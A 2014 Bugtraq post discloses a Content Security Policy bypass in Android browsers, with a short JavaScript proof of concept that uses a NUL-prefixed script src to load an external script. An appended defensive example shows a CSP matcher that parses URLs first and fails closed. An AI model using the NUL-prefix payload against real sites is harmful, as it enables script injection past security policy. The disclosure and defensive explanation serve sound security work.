Message-Id: <201410101545.s9AFjAUA011144@sf01web3.securityfocus.com>
Date: Fri, 10 Oct 2014 15:45:10 GMT
From: evanjjohns@...il.com
To: bugtraq@...urityfocus.com
Subject: CSP Bypass in android browser prior to 4.4

Hello. I hope this is the correct place to report this bug.

I've found a Content Security Policy bypass that is similar to, and related to, the same-origin policy bypass in this CVE. This is a separate vulnerability, however.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041

I've tested this on an Android 4.3 tablet. I've tested this and it works on Firefox (32.0.2), InBrowser, and Dolphin (App info doesn't give a version). I also tested the default Android browser on a 4.3.1 emulator, which was also vulnerable.

PoC:

    <input type=button value="test" onclick="
      /* Inject a script element whose src carries a leading NUL (\u0000). */
      a=document.createElement('script');
      a.id='AA';
      a.src='\u0000https://js.stripe.com/v2/';
      document.body.appendChild(a);
      /* After a short delay, report whether the external script ran: the
         Stripe global exists only if js.stripe.com/v2/ was fetched and
         executed despite the policy. */
      setTimeout(function(){
        if(typeof Stripe!=='undefined'){alert(Stripe);}else{alert(2);}
      }, 400);
      return false;">

The content security policy rule that should block this is:

    script-src 'self' https://js.stripe.com/v2/ ;

The PoC worked if you see a popup containing Stripe's e(){} object. You can test this on http://ejj.io/test.php

Cheers,
Evan J
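The property a CSP enforcer needs so that a control-character prefix like the NUL byte in the PoC above cannot make the policy check and the resource loader disagree is that both decide on the same parsed URL. The following is an added example, not code from Evan's post or from any browser's CSP engine: a small script-src matcher that parses the src with the WHATWG URL parser (which strips leading and trailing C0 controls, so the NUL-prefixed string canonicalizes to https://js.stripe.com/v2/) and fails closed on anything it cannot parse or match. It assumes Node.js with its global URL class; the page origin, policies and src strings are constructed inputs mirroring the post, and the handled source-expression forms are limited to 'self' and a host source with an optional path.

```javascript
// Added example, not from the original post or any browser's CSP code.
// Assumes Node.js (WHATWG-compliant global URL class).

// Parse a script src the way the loader will. The WHATWG URL parser strips
// leading and trailing C0 control characters and spaces, so
// "\u0000https://js.stripe.com/v2/" parses to "https://js.stripe.com/v2/".
// Returns null when the value is not a URL at all.
function parseScriptUrl(rawSrc, pageUrl) {
  try {
    return new URL(rawSrc, pageUrl);
  } catch (e) {
    return null;
  }
}

// A string-level test on the raw attribute value. An enforcer must not rely
// on checks like this: for control-character-prefixed values they give a
// different answer from the parser the loader uses.
function rawLooksHttps(rawSrc) {
  return rawSrc.startsWith('https:');
}

// Match one parsed URL against one source expression. Only the forms used by
// the policy in the post are handled: 'self' and a host source with an
// optional path (a path ending in '/' is a prefix match, otherwise exact).
// Ports, wildcards and scheme-only sources are out of scope here.
function matchesSource(url, source, pageUrl) {
  if (source === "'self'") {
    return url.protocol === pageUrl.protocol && url.host === pageUrl.host;
  }
  const allowed = new URL(source);
  if (url.protocol !== allowed.protocol || url.host !== allowed.host) {
    return false;
  }
  if (allowed.pathname === '/') return true;          // whole host allowed
  return allowed.pathname.endsWith('/')
    ? url.pathname.startsWith(allowed.pathname)       // directory prefix
    : url.pathname === allowed.pathname;              // exact file
}

// Enforce a script-src list for a candidate script src. Fails closed: a value
// that does not parse, or that matches no source expression, is blocked.
function scriptAllowed(rawSrc, scriptSrcList, pageOrigin) {
  const pageUrl = new URL(pageOrigin);
  const url = parseScriptUrl(rawSrc, pageOrigin);
  if (url === null) return false;
  return scriptSrcList.some((src) => matchesSource(url, src, pageUrl));
}

// Constructed inputs mirroring the post: the test page, the NUL-prefixed
// Stripe src, a policy that lists js.stripe.com/v2/ and one that does not.
const PAGE = 'http://ejj.io/test.php';
const NUL_SRC = '\u0000https://js.stripe.com/v2/';
const POLICY_WITH_STRIPE = ["'self'", 'https://js.stripe.com/v2/'];
const POLICY_SELF_ONLY = ["'self'"];

console.log('raw value starts with https: ', rawLooksHttps(NUL_SRC));
console.log('parsed href:                 ', parseScriptUrl(NUL_SRC, PAGE).href);
console.log('allowed under stripe policy: ', scriptAllowed(NUL_SRC, POLICY_WITH_STRIPE, PAGE));
console.log('allowed under self-only:     ', scriptAllowed(NUL_SRC, POLICY_SELF_ONLY, PAGE));
```

The point of the two console lines at the top is the discrepancy: the raw string does not start with `https:`, yet the parsed URL is exactly the Stripe URL. An enforcer that classifies the raw string (or skips enforcement for values it cannot classify) reaches a different verdict from the loader; one that parses first, as `scriptAllowed` does, blocks the NUL-prefixed src under a 'self'-only policy and allows it only when js.stripe.com/v2/ is actually listed.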